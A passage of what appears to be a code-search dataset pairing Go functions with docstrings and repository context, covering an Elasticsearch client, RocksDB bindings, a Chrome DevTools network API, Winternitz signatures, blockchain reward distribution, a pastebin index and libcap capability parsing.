"name": strings.Join(s.name, ","),
})
} else if len(s.index) > 0 && len(s.typ) > 0 && len(s.name) == 0 {
path, err = uritemplates.Expand("/{index}/{type}/_warmer", map[string]string{
"index": strings.Join(s.index, ","),
"type": strings.Join(s.typ, ","),
})
} else if len(s.index) > 0 && len(s.typ) > 0 && len(s.name) > 0 {
path, err = uritemplates.Expand("/{index}/{type}/_warmer/{name}", map[string]string{
"index": strings.Join(s.index, ","),
"type": strings.Join(s.typ, ","),
"name": strings.Join(s.name, ","),
})
}
if err != nil {
return "", url.Values{}, err
}
params := url.Values{}
if s.pretty {
params.Set("pretty", "1")
}
if s.allowNoIndices != nil {
params.Set("allow_no_indices", fmt.Sprintf("%v", *s.allowNoIndices))
}
if s.expandWildcards != "" {
params.Set("expand_wildcards", s.expandWildcards)
}
if s.ignoreUnavailable != nil {
params.Set("ignore_unavailable", fmt.Sprintf("%v", *s.ignoreUnavailable))
}
if s.local != nil {
params.Set("local", fmt.Sprintf("%v", *s.local))
}
return path, params, nil
} | buildURL builds the URL for the operation. | https://github.com/grimmer0125/search-github-starred/blob/e0a11162ad6f63d93df3898fd32295f7c9d3faa4/vendor/github.com/grimmer0125/elastic/indices_get_warmer.go#L99-L161 | package elastic
import (
"fmt"
"net/url"
"strings"
"gopkg.in/olivere/elastic.v3/uritemplates"
)
type IndicesGetWarmerService struct {
client *Client
pretty bool
index []string
name []string
typ []string
allowNoIndices *bool
expandWildcards string
ignoreUnavailable *bool
local *bool
}
func NewIndicesGetWarmerService(client *Client) *IndicesGetWarmerService {
return &IndicesGetWarmerService{
client: client,
typ: make([]string, 0),
index: make([]string, 0),
name: make([]string, 0),
}
}
func (s *IndicesGetWarmerService) Index(indices ...string) *IndicesGetWarmerService {
s.index = append(s.index, indices...)
return s
}
func (s *IndicesGetWarmerService) Name(name ...string) *IndicesGetWarmerService {
s.name = append(s.name, name...)
return s
}
func (s *IndicesGetWarmerService) Type(typ ...string) *IndicesGetWarmerService {
s.typ = append(s.typ, typ...)
return s
}
func (s *IndicesGetWarmerService) AllowNoIndices(allowNoIndices bool) *IndicesGetWarmerService {
s.allowNoIndices = &allowNoIndices
return s
}
func (s *IndicesGetWarmerService) ExpandWildcards(expandWildcards string) *IndicesGetWarmerService {
s.expandWildcards = expandWildcards
return s
}
func (s *IndicesGetWarmerService) IgnoreUnavailable(ignoreUnavailable bool) *IndicesGetWarmerService {
s.ignoreUnavailable = &ignoreUnavailable
return s
}
func (s *IndicesGetWarmerService) Local(local bool) *IndicesGetWarmerService {
s.local = &local
return s
}
func (s *IndicesGetWarmerService) Pretty(pretty bool) *IndicesGetWarmerService {
s.pretty = pretty
return s
} | MIT License |
sfproductlabs/dcrontab | dcrontab/gorocksdb/options_read.go | Destroy | go | func (opts *ReadOptions) Destroy() {
C.rocksdb_readoptions_destroy(opts.c)
opts.c = nil
} | Destroy deallocates the ReadOptions object. | https://github.com/sfproductlabs/dcrontab/blob/4cece40aa4d35858a142d8ec5f2c89553fc9c519/dcrontab/gorocksdb/options_read.go#L122-L125 | package gorocksdb
import "C"
import "unsafe"
type ReadTier uint
const (
ReadAllTier = ReadTier(0)
BlockCacheTier = ReadTier(1)
)
type ReadOptions struct {
c *C.rocksdb_readoptions_t
}
func NewDefaultReadOptions() *ReadOptions {
return NewNativeReadOptions(C.rocksdb_readoptions_create())
}
func NewNativeReadOptions(c *C.rocksdb_readoptions_t) *ReadOptions {
return &ReadOptions{c}
}
func (opts *ReadOptions) UnsafeGetReadOptions() unsafe.Pointer {
return unsafe.Pointer(opts.c)
}
func (opts *ReadOptions) SetVerifyChecksums(value bool) {
C.rocksdb_readoptions_set_verify_checksums(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetFillCache(value bool) {
C.rocksdb_readoptions_set_fill_cache(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetSnapshot(snap *Snapshot) {
C.rocksdb_readoptions_set_snapshot(opts.c, snap.c)
}
func (opts *ReadOptions) SetReadTier(value ReadTier) {
C.rocksdb_readoptions_set_read_tier(opts.c, C.int(value))
}
func (opts *ReadOptions) SetTailing(value bool) {
C.rocksdb_readoptions_set_tailing(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetIterateUpperBound(key []byte) {
cKey := byteToChar(key)
cKeyLen := C.size_t(len(key))
C.rocksdb_readoptions_set_iterate_upper_bound(opts.c, cKey, cKeyLen)
}
func (opts *ReadOptions) SetPinData(value bool) {
C.rocksdb_readoptions_set_pin_data(opts.c, boolToChar(value))
}
func (opts *ReadOptions) SetReadaheadSize(value uint64) {
C.rocksdb_readoptions_set_readahead_size(opts.c, C.size_t(value))
} | Apache License 2.0 |
wirepair/autogcd | vendor/github.com/wirepair/gcd/gcdapi/network.go | DeleteCookies | go | func (c *Network) DeleteCookies(name string, url string, domain string, path string) (*gcdmessage.ChromeResponse, error) {
var v NetworkDeleteCookiesParams
v.Name = name
v.Url = url
v.Domain = domain
v.Path = path
return c.DeleteCookiesWithParams(&v)
} | DeleteCookies - Deletes browser cookies with matching name and url or domain/path pair.
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path. | https://github.com/wirepair/autogcd/blob/80392884ea9402ba4b8ecb1eccf361611b171df8/vendor/github.com/wirepair/gcd/gcdapi/network.go#L597-L604 | package gcdapi
import (
"encoding/json"
"github.com/wirepair/gcd/gcdmessage"
)
type NetworkResourceTiming struct {
RequestTime float64 `json:"requestTime"`
ProxyStart float64 `json:"proxyStart"`
ProxyEnd float64 `json:"proxyEnd"`
DnsStart float64 `json:"dnsStart"`
DnsEnd float64 `json:"dnsEnd"`
ConnectStart float64 `json:"connectStart"`
ConnectEnd float64 `json:"connectEnd"`
SslStart float64 `json:"sslStart"`
SslEnd float64 `json:"sslEnd"`
WorkerStart float64 `json:"workerStart"`
WorkerReady float64 `json:"workerReady"`
SendStart float64 `json:"sendStart"`
SendEnd float64 `json:"sendEnd"`
PushStart float64 `json:"pushStart"`
PushEnd float64 `json:"pushEnd"`
ReceiveHeadersEnd float64 `json:"receiveHeadersEnd"`
}
type NetworkRequest struct {
Url string `json:"url"`
UrlFragment string `json:"urlFragment,omitempty"`
Method string `json:"method"`
Headers map[string]interface{} `json:"headers"`
PostData string `json:"postData,omitempty"`
HasPostData bool `json:"hasPostData,omitempty"`
MixedContentType string `json:"mixedContentType,omitempty"`
InitialPriority string `json:"initialPriority"`
ReferrerPolicy string `json:"referrerPolicy"`
IsLinkPreload bool `json:"isLinkPreload,omitempty"`
}
type NetworkSignedCertificateTimestamp struct {
Status string `json:"status"`
Origin string `json:"origin"`
LogDescription string `json:"logDescription"`
LogId string `json:"logId"`
Timestamp float64 `json:"timestamp"`
HashAlgorithm string `json:"hashAlgorithm"`
SignatureAlgorithm string `json:"signatureAlgorithm"`
SignatureData string `json:"signatureData"`
}
type NetworkSecurityDetails struct {
Protocol string `json:"protocol"`
KeyExchange string `json:"keyExchange"`
KeyExchangeGroup string `json:"keyExchangeGroup,omitempty"`
Cipher string `json:"cipher"`
Mac string `json:"mac,omitempty"`
CertificateId int `json:"certificateId"`
SubjectName string `json:"subjectName"`
SanList []string `json:"sanList"`
Issuer string `json:"issuer"`
ValidFrom float64 `json:"validFrom"`
ValidTo float64 `json:"validTo"`
SignedCertificateTimestampList []*NetworkSignedCertificateTimestamp `json:"signedCertificateTimestampList"`
CertificateTransparencyCompliance string `json:"certificateTransparencyCompliance"`
}
type NetworkResponse struct {
Url string `json:"url"`
Status int `json:"status"`
StatusText string `json:"statusText"`
Headers map[string]interface{} `json:"headers"`
HeadersText string `json:"headersText,omitempty"`
MimeType string `json:"mimeType"`
RequestHeaders map[string]interface{} `json:"requestHeaders,omitempty"`
RequestHeadersText string `json:"requestHeadersText,omitempty"`
ConnectionReused bool `json:"connectionReused"`
ConnectionId float64 `json:"connectionId"`
RemoteIPAddress string `json:"remoteIPAddress,omitempty"`
RemotePort int `json:"remotePort,omitempty"`
FromDiskCache bool `json:"fromDiskCache,omitempty"`
FromServiceWorker bool `json:"fromServiceWorker,omitempty"`
EncodedDataLength float64 `json:"encodedDataLength"`
Timing *NetworkResourceTiming `json:"timing,omitempty"`
Protocol string `json:"protocol,omitempty"`
SecurityState string `json:"securityState"`
SecurityDetails *NetworkSecurityDetails `json:"securityDetails,omitempty"`
}
type NetworkWebSocketRequest struct {
Headers map[string]interface{} `json:"headers"`
}
type NetworkWebSocketResponse struct {
Status int `json:"status"`
StatusText string `json:"statusText"`
Headers map[string]interface{} `json:"headers"`
HeadersText string `json:"headersText,omitempty"`
RequestHeaders map[string]interface{} `json:"requestHeaders,omitempty"`
RequestHeadersText string `json:"requestHeadersText,omitempty"`
}
type NetworkWebSocketFrame struct {
Opcode float64 `json:"opcode"`
Mask bool `json:"mask"`
PayloadData string `json:"payloadData"`
}
type NetworkCachedResource struct {
Url string `json:"url"`
Type string `json:"type"`
Response *NetworkResponse `json:"response,omitempty"`
BodySize float64 `json:"bodySize"`
}
type NetworkInitiator struct {
Type string `json:"type"`
Stack *RuntimeStackTrace `json:"stack,omitempty"`
Url string `json:"url,omitempty"`
LineNumber float64 `json:"lineNumber,omitempty"`
}
type NetworkCookie struct {
Name string `json:"name"`
Value string `json:"value"`
Domain string `json:"domain"`
Path string `json:"path"`
Expires float64 `json:"expires"`
Size int `json:"size"`
HttpOnly bool `json:"httpOnly"`
Secure bool `json:"secure"`
Session bool `json:"session"`
SameSite string `json:"sameSite,omitempty"`
}
type NetworkCookieParam struct {
Name string `json:"name"`
Value string `json:"value"`
Url string `json:"url,omitempty"`
Domain string `json:"domain,omitempty"`
Path string `json:"path,omitempty"`
Secure bool `json:"secure,omitempty"`
HttpOnly bool `json:"httpOnly,omitempty"`
SameSite string `json:"sameSite,omitempty"`
Expires float64 `json:"expires,omitempty"`
}
type NetworkAuthChallenge struct {
Source string `json:"source,omitempty"`
Origin string `json:"origin"`
Scheme string `json:"scheme"`
Realm string `json:"realm"`
}
type NetworkAuthChallengeResponse struct {
Response string `json:"response"`
Username string `json:"username,omitempty"`
Password string `json:"password,omitempty"`
}
type NetworkRequestPattern struct {
UrlPattern string `json:"urlPattern,omitempty"`
ResourceType string `json:"resourceType,omitempty"`
InterceptionStage string `json:"interceptionStage,omitempty"`
}
type NetworkSignedExchangeSignature struct {
Label string `json:"label"`
Signature string `json:"signature"`
Integrity string `json:"integrity"`
CertUrl string `json:"certUrl,omitempty"`
CertSha256 string `json:"certSha256,omitempty"`
ValidityUrl string `json:"validityUrl"`
Date int `json:"date"`
Expires int `json:"expires"`
Certificates []string `json:"certificates,omitempty"`
}
type NetworkSignedExchangeHeader struct {
RequestUrl string `json:"requestUrl"`
RequestMethod string `json:"requestMethod"`
ResponseCode int `json:"responseCode"`
ResponseHeaders map[string]interface{} `json:"responseHeaders"`
Signatures []*NetworkSignedExchangeSignature `json:"signatures"`
}
type NetworkSignedExchangeError struct {
Message string `json:"message"`
SignatureIndex int `json:"signatureIndex,omitempty"`
ErrorField string `json:"errorField,omitempty"`
}
type NetworkSignedExchangeInfo struct {
OuterResponse *NetworkResponse `json:"outerResponse"`
Header *NetworkSignedExchangeHeader `json:"header,omitempty"`
SecurityDetails *NetworkSecurityDetails `json:"securityDetails,omitempty"`
Errors []*NetworkSignedExchangeError `json:"errors,omitempty"`
}
type NetworkDataReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
DataLength int `json:"dataLength"`
EncodedDataLength int `json:"encodedDataLength"`
} `json:"Params,omitempty"`
}
type NetworkEventSourceMessageReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
EventName string `json:"eventName"`
EventId string `json:"eventId"`
Data string `json:"data"`
} `json:"Params,omitempty"`
}
type NetworkLoadingFailedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Type string `json:"type"`
ErrorText string `json:"errorText"`
Canceled bool `json:"canceled,omitempty"`
BlockedReason string `json:"blockedReason,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkLoadingFinishedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
EncodedDataLength float64 `json:"encodedDataLength"`
ShouldReportCorbBlocking bool `json:"shouldReportCorbBlocking,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkRequestInterceptedEvent struct {
Method string `json:"method"`
Params struct {
InterceptionId string `json:"interceptionId"`
Request *NetworkRequest `json:"request"`
FrameId string `json:"frameId"`
ResourceType string `json:"resourceType"`
IsNavigationRequest bool `json:"isNavigationRequest"`
IsDownload bool `json:"isDownload,omitempty"`
RedirectUrl string `json:"redirectUrl,omitempty"`
AuthChallenge *NetworkAuthChallenge `json:"authChallenge,omitempty"`
ResponseErrorReason string `json:"responseErrorReason,omitempty"`
ResponseStatusCode int `json:"responseStatusCode,omitempty"`
ResponseHeaders map[string]interface{} `json:"responseHeaders,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkRequestServedFromCacheEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
} `json:"Params,omitempty"`
}
type NetworkRequestWillBeSentEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
LoaderId string `json:"loaderId"`
DocumentURL string `json:"documentURL"`
Request *NetworkRequest `json:"request"`
Timestamp float64 `json:"timestamp"`
WallTime float64 `json:"wallTime"`
Initiator *NetworkInitiator `json:"initiator"`
RedirectResponse *NetworkResponse `json:"redirectResponse,omitempty"`
Type string `json:"type,omitempty"`
FrameId string `json:"frameId,omitempty"`
HasUserGesture bool `json:"hasUserGesture,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkResourceChangedPriorityEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
NewPriority string `json:"newPriority"`
Timestamp float64 `json:"timestamp"`
} `json:"Params,omitempty"`
}
type NetworkSignedExchangeReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Info *NetworkSignedExchangeInfo `json:"info"`
} `json:"Params,omitempty"`
}
type NetworkResponseReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
LoaderId string `json:"loaderId"`
Timestamp float64 `json:"timestamp"`
Type string `json:"type"`
Response *NetworkResponse `json:"response"`
FrameId string `json:"frameId,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketClosedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketCreatedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Url string `json:"url"`
Initiator *NetworkInitiator `json:"initiator,omitempty"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameErrorEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
ErrorMessage string `json:"errorMessage"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketFrame `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketFrameSentEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketFrame `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketHandshakeResponseReceivedEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
Response *NetworkWebSocketResponse `json:"response"`
} `json:"Params,omitempty"`
}
type NetworkWebSocketWillSendHandshakeRequestEvent struct {
Method string `json:"method"`
Params struct {
RequestId string `json:"requestId"`
Timestamp float64 `json:"timestamp"`
WallTime float64 `json:"wallTime"`
Request *NetworkWebSocketRequest `json:"request"`
} `json:"Params,omitempty"`
}
type Network struct {
target gcdmessage.ChromeTargeter
}
func NewNetwork(target gcdmessage.ChromeTargeter) *Network {
c := &Network{target: target}
return c
}
func (c *Network) CanClearBrowserCache() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canClearBrowserCache"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) CanClearBrowserCookies() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canClearBrowserCookies"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) CanEmulateNetworkConditions() (bool, error) {
resp, err := gcdmessage.SendCustomReturn(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.canEmulateNetworkConditions"})
if err != nil {
return false, err
}
var chromeData struct {
Result struct {
Result bool
}
}
if resp == nil {
return false, &gcdmessage.ChromeEmptyResponseErr{}
}
cerr := &gcdmessage.ChromeErrorResponse{}
json.Unmarshal(resp.Data, cerr)
if cerr != nil && cerr.Error != nil {
return false, &gcdmessage.ChromeRequestErr{Resp: cerr}
}
if err := json.Unmarshal(resp.Data, &chromeData); err != nil {
return false, err
}
return chromeData.Result.Result, nil
}
func (c *Network) ClearBrowserCache() (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.clearBrowserCache"})
}
func (c *Network) ClearBrowserCookies() (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.clearBrowserCookies"})
}
type NetworkContinueInterceptedRequestParams struct {
InterceptionId string `json:"interceptionId"`
ErrorReason string `json:"errorReason,omitempty"`
RawResponse string `json:"rawResponse,omitempty"`
Url string `json:"url,omitempty"`
Method string `json:"method,omitempty"`
PostData string `json:"postData,omitempty"`
Headers map[string]interface{} `json:"headers,omitempty"`
AuthChallengeResponse *NetworkAuthChallengeResponse `json:"authChallengeResponse,omitempty"`
}
func (c *Network) ContinueInterceptedRequestWithParams(v *NetworkContinueInterceptedRequestParams) (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.continueInterceptedRequest", Params: v})
}
func (c *Network) ContinueInterceptedRequest(interceptionId string, errorReason string, rawResponse string, url string, method string, postData string, headers map[string]interface{}, authChallengeResponse *NetworkAuthChallengeResponse) (*gcdmessage.ChromeResponse, error) {
var v NetworkContinueInterceptedRequestParams
v.InterceptionId = interceptionId
v.ErrorReason = errorReason
v.RawResponse = rawResponse
v.Url = url
v.Method = method
v.PostData = postData
v.Headers = headers
v.AuthChallengeResponse = authChallengeResponse
return c.ContinueInterceptedRequestWithParams(&v)
}
type NetworkDeleteCookiesParams struct {
Name string `json:"name"`
Url string `json:"url,omitempty"`
Domain string `json:"domain,omitempty"`
Path string `json:"path,omitempty"`
}
func (c *Network) DeleteCookiesWithParams(v *NetworkDeleteCookiesParams) (*gcdmessage.ChromeResponse, error) {
return gcdmessage.SendDefaultRequest(c.target, c.target.GetSendCh(), &gcdmessage.ParamRequest{Id: c.target.GetId(), Method: "Network.deleteCookies", Params: v})
} | MIT License |
loccs/mss | ots/winternitz/prkg.go | Init | go | func (prkg *KeyIterator) Init(compositeSeed []byte) bool {
buf := bytes.NewBuffer(compositeSeed)
var fieldLen uint8
if err := binary.Read(buf, binary.BigEndian,
&fieldLen); (nil != err) && (0 == fieldLen) {
return false
}
compactSeed := make([]byte, fieldLen)
if err := binary.Read(buf, binary.BigEndian,
compactSeed); nil != err {
return false
}
prkg.rng = rand.New(compactSeed)
if nil == prkg.WtnOpts {
prkg.WtnOpts = NewWtnOpts(SecurityLevel)
}
var offset uint32
if err := binary.Read(buf, binary.BigEndian,
&offset); nil != err {
return false
}
prkg.offset = offset
prkg.SetKeyIdx(prkg.offset)
fieldLen = 0
if err := binary.Read(buf, binary.BigEndian,
&fieldLen); (nil != err) && (0 == fieldLen) {
return false
}
nonce := make([]byte, fieldLen)
if err := binary.Read(buf, binary.BigEndian,
nonce); io.ErrUnexpectedEOF == err {
return false
}
prkg.WtnOpts.SetNonce(nonce)
return true
} | Init initialises the prkgator with the composite seed
exported by Serialize() | https://github.com/loccs/mss/blob/f05ec83eac58e4e9a45aa7674b7c533c112980ba/ots/winternitz/prkg.go#L36-L85 | package winternitz
import (
"bytes"
"encoding/binary"
"io"
"github.com/LoCCS/mss/rand"
)
type KeyIterator struct {
rng *rand.Rand
offset uint32
*WtnOpts
}
func NewKeyIterator(compactSeed []byte) *KeyIterator {
prkg := new(KeyIterator)
prkg.rng = rand.New(compactSeed)
prkg.offset = 0
prkg.WtnOpts = NewWtnOpts(SecurityLevel)
return prkg
} | MIT License |
dipper-labs/dipper-protocol | app/v0/distribution/keeper/allocation.go | AllocateTokensToValidator | go | func (k Keeper) AllocateTokensToValidator(ctx sdk.Context, val exported.ValidatorI, tokens sdk.DecCoins) {
commission := tokens.MulDec(val.GetCommission())
shared := tokens.Sub(commission)
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeCommission,
sdk.NewAttribute(sdk.AttributeKeyAmount, commission.String()),
sdk.NewAttribute(types.AttributeKeyValidator, val.GetOperator().String()),
),
)
currentCommission := k.GetValidatorAccumulatedCommission(ctx, val.GetOperator())
currentCommission = currentCommission.Add(commission)
k.SetValidatorAccumulatedCommission(ctx, val.GetOperator(), currentCommission)
currentRewards := k.GetValidatorCurrentRewards(ctx, val.GetOperator())
currentRewards.Rewards = currentRewards.Rewards.Add(shared)
k.SetValidatorCurrentRewards(ctx, val.GetOperator(), currentRewards)
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeRewards,
sdk.NewAttribute(sdk.AttributeKeyAmount, tokens.String()),
sdk.NewAttribute(types.AttributeKeyValidator, val.GetOperator().String()),
),
)
outstanding := k.GetValidatorOutstandingRewards(ctx, val.GetOperator())
outstanding = outstanding.Add(tokens)
k.SetValidatorOutstandingRewards(ctx, val.GetOperator(), outstanding)
} | AllocateTokensToValidator allocate tokens to a particular validator, splitting according to commission | https://github.com/dipper-labs/dipper-protocol/blob/94dd33dd64dee9971092c42352fe8d455e8458de/app/v0/distribution/keeper/allocation.go#L100-L133 | package keeper
import (
"fmt"
abci "github.com/tendermint/tendermint/abci/types"
"github.com/Dipper-Labs/Dipper-Protocol/app/v0/distribution/types"
"github.com/Dipper-Labs/Dipper-Protocol/app/v0/staking/exported"
sdk "github.com/Dipper-Labs/Dipper-Protocol/types"
)
func (k Keeper) AllocateTokens(
ctx sdk.Context, sumPreviousPrecommitPower, totalPreviousPower int64,
previousProposer sdk.ConsAddress, previousVotes []abci.VoteInfo,
) {
logger := k.Logger(ctx)
feeCollector := k.supplyKeeper.GetModuleAccount(ctx, k.feeCollectorName)
feesCollectedInt := feeCollector.GetCoins()
feesCollected := sdk.NewDecCoins(feesCollectedInt)
err := k.supplyKeeper.SendCoinsFromModuleToModule(ctx, k.feeCollectorName, types.ModuleName, feesCollectedInt)
if err != nil {
panic(err)
}
feePool := k.GetFeePool(ctx)
if totalPreviousPower == 0 {
feePool.CommunityPool = feePool.CommunityPool.Add(feesCollected)
k.SetFeePool(ctx, feePool)
return
}
previousFractionVotes := sdk.NewDec(sumPreviousPrecommitPower).Quo(sdk.NewDec(totalPreviousPower))
baseProposerReward := k.GetBaseProposerReward(ctx)
bonusProposerReward := k.GetBonusProposerReward(ctx)
proposerMultiplier := baseProposerReward.Add(bonusProposerReward.MulTruncate(previousFractionVotes))
proposerReward := feesCollected.MulDecTruncate(proposerMultiplier)
remaining := feesCollected
proposerValidator := k.stakingKeeper.ValidatorByConsAddr(ctx, previousProposer)
if proposerValidator != nil {
ctx.EventManager().EmitEvent(
sdk.NewEvent(
types.EventTypeProposerReward,
sdk.NewAttribute(sdk.AttributeKeyAmount, proposerReward.String()),
sdk.NewAttribute(types.AttributeKeyValidator, proposerValidator.GetOperator().String()),
),
)
k.AllocateTokensToValidator(ctx, proposerValidator, proposerReward)
remaining = remaining.Sub(proposerReward)
} else {
logger.Error(fmt.Sprintf(
"WARNING: Attempt to allocate proposer rewards to unknown proposer %s. "+
"This should happen only if the proposer unbonded completely within a single block, "+
"which generally should not happen except in exceptional circumstances (or fuzz testing). "+
"We recommend you investigate immediately.",
previousProposer.String()))
}
communityTax := k.GetCommunityTax(ctx)
voteMultiplier := sdk.OneDec().Sub(proposerMultiplier).Sub(communityTax)
for _, vote := range previousVotes {
validator := k.stakingKeeper.ValidatorByConsAddr(ctx, vote.Validator.Address)
powerFraction := sdk.NewDec(vote.Validator.Power).QuoTruncate(sdk.NewDec(totalPreviousPower))
reward := feesCollected.MulDecTruncate(voteMultiplier).MulDecTruncate(powerFraction)
k.AllocateTokensToValidator(ctx, validator, reward)
remaining = remaining.Sub(reward)
}
feePool.CommunityPool = feePool.CommunityPool.Add(remaining)
k.SetFeePool(ctx, feePool)
} | Apache License 2.0 |
mayocream/pastebin-ipfs | pkg/index/index.go | FilterFileCid | go | func (i *Index) FilterFileCid(limit int) (ids []string, err error) {
err = i.db.Update(func(txn *badger.Txn) error {
opts := badger.DefaultIteratorOptions
opts.Reverse = true
it := txn.NewIterator(opts)
defer it.Close()
var i int
for it.Rewind(); it.Valid(); it.Next() {
if !bytes.HasPrefix(it.Item().Key(), []byte(recentPrefix)) {
continue
}
i++
if i > limit {
if err := txn.Delete(it.Item().Key()); err != nil {
return err
}
continue
}
v, _ := it.Item().ValueCopy(nil)
ids = append(ids, string(v))
}
return nil
})
return
} | FIXME not works... | https://github.com/mayocream/pastebin-ipfs/blob/216d5c496434348eecc44577506b37bcc91347d7/pkg/index/index.go#L77-L104 | package index
import (
"bytes"
"errors"
"time"
"github.com/dgraph-io/badger/v3"
"github.com/spf13/cast"
"go.uber.org/atomic"
)
var atom atomic.Uint32
type Index struct {
db *badger.DB
}
type ObjectType int
const (
ObjectTypeFile ObjectType = iota + 1
ObjectTypeDir
ObjectTypeMeta
)
const (
existPrefix = "_cid"
recentPrefix = "_recent"
)
func NewIndex(path string) (*Index, error) {
db, err := badger.Open(badger.DefaultOptions(path))
if err != nil {
return nil, err
}
idx := &Index{
db: db,
}
return idx, nil
}
func (i *Index) SetExist(cid string, ot ObjectType) error {
return i.db.Update(func(txn *badger.Txn) error {
if ot == ObjectTypeDir {
sortStr := cast.ToString(time.Now().UnixNano())
sortStr += cast.ToString(atom.Add(1))
txn.Set([]byte(recentPrefix+sortStr), []byte(cid))
}
return txn.Set([]byte(existPrefix+cid), []byte(cast.ToString(ot)))
})
}
func (i *Index) Exist(cid string) (ok bool, err error) {
i.db.View(func(txn *badger.Txn) error {
_, err := txn.Get([]byte(existPrefix + cid))
if err == nil {
ok = true
return nil
}
if errors.Is(err, badger.ErrKeyNotFound) {
return nil
}
return err
})
return
} | MIT License |
kayrus/gof5 | vendor/kernel.org/pub/linux/libs/security/libcap/cap/iab.go | IABFromText | go | func IABFromText(text string) (*IAB, error) {
iab := IABInit()
if len(text) == 0 {
return iab, nil
}
for _, f := range strings.Split(text, ",") {
var i, a, nb bool
var j int
for j = 0; j < len(f); j++ {
switch f[j : j+1] {
case "!":
nb = true
case "^":
i = true
a = true
case "%":
i = true
default:
goto done
}
}
done:
c, err := FromName(f[j:])
if err != nil {
return nil, err
}
offset, mask := omask(c)
if i || !nb {
iab.i[offset] |= mask
}
if a {
iab.a[offset] |= mask
}
if nb {
iab.nb[offset] |= mask
}
}
return iab, nil
} | IABFromText parses a string representing an IAB, as generated
by IAB.String(), to generate an IAB. | https://github.com/kayrus/gof5/blob/bbbfa3b65046bb6be028936863c7d3e1a9ad164c/vendor/kernel.org/pub/linux/libs/security/libcap/cap/iab.go#L80-L118 | package cap
import "strings"
func omask(c Value) (uint, uint32) {
u := uint(c)
return u >> 5, uint32(1) << (u & 31)
}
type IAB struct {
a, i, nb []uint32
}
type Vector uint
const (
Inh Vector = iota
Amb
Bound
)
func (v Vector) String() string {
switch v {
case Inh:
return "I"
case Amb:
return "A"
case Bound:
return "B"
default:
return "<Error>"
}
}
func IABInit() *IAB {
startUp.Do(multisc.cInit)
return &IAB{
i: make([]uint32, words),
a: make([]uint32, words),
nb: make([]uint32, words),
}
}
func IABGetProc() *IAB {
iab := IABInit()
current := GetProc()
iab.Fill(Inh, current, Inheritable)
for c := MaxBits(); c > 0; {
c--
offset, mask := omask(c)
if a, _ := GetAmbient(c); a {
iab.a[offset] |= mask
}
if b, err := GetBound(c); err == nil && !b {
